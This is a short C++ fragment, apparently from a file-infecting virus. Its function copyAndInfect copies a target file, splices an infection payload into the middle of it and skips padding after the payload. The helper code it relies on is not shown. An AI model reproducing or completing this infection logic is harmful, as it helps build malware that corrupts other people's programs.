bool Target::copyAndInfect()
{
  write(fd_dst, p.b, top); // first part of original target
  writeInfection();

  enum { SKIP_SIZE = INFECTION_SIZE - sizeof(infection) + 1 };
  fprintf(stderr, "skipped %u bytes, ", SKIP_SIZE);
  lseek(fd_dst, SKIP_SIZE, SEEK_CUR);

  write(fd_dst, p.b + top, filesize - top); // rest of original target
  return true;
}
